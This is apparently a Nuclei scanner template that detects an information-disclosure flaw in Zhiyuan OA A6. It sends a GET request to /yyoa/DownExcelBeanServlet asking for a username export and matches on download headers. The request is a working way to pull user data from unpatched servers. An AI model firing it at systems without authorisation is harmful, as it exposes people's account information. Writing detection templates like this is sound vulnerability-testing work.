id: zhiyuan-oa-info-leak info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info reference: - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md tags: zhiyuan,leak,disclosure requests: - method: GET path: - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" matchers-condition: and matchers: - type: word words: - "attachment" - "application/x-msdownload" part: header condition: and - type: status status: - 200